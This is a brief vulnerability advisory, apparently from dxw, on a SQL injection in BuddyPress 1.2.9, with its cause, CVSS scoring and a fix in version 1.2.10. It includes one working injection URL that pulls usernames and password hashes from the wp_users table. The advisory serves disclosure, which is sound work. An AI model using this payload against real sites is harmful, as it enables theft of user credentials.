SQL injections in BuddyPress 1.2.9

Vulnerability

Last revised: June 20, 2013

A SQL injection exists in BuddyPress 1.2.9 allowing arbitrary queries to be run on the database by a non-privileged user.

This vulnerabilities arises from BuddyPress’s use of SQL queries that are created by appending strings together, without properly preparing input variables.

A simple query that can be run is:

http://buddypress.local/groups/test-group/activity/-9)union(select(1),(2),(3),(4),(5),concat(user_login,0x3a,user_pass),(7),(8),(9),(10),(11),(12),(13)from(wp_users)

The query string is mapped to a parameter named $activity_ids which is appended, unprepared, to a statement in buddypress/bp-activity/bp-activity-classes.php at line 192.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score	8.5 High
Vector	Network
Complexity	Low
Authentication	None
Confidentiality	Partial
Integrity	None
Availability	Complete

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Advisory timeline

Mitigation/further actions

This issue was reported to the vendor and the issue is reported fixed in BuddyPress 1.2.10.

dxw advisories

Advisory: